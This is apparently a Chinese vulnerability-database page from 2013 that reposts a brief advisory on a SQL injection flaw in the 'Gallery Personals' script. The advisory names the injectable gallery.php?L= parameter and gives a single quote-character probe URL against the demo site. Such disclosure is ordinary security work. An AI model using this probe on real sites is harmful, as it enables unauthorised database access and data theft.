Scripts Genie Gallery Personals SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1045586 漏洞类型
发布时间 2013-02-18 更新时间 2013-02-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013020122
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
##################################################################################																
Gallery Personals Script SQL Injection Vulnerabilities
Software Page: http://scriptsgenie.com/
Product Page: http://www.hotscripts.com/listing/gallery-personals/
Script Demo: http://resalemembership.com/demos/pgallery/

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhats Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site (/gallery.php?L=)

>>> http://server/demos/pgallery/gallery.php?L=2' (MySQLi Found)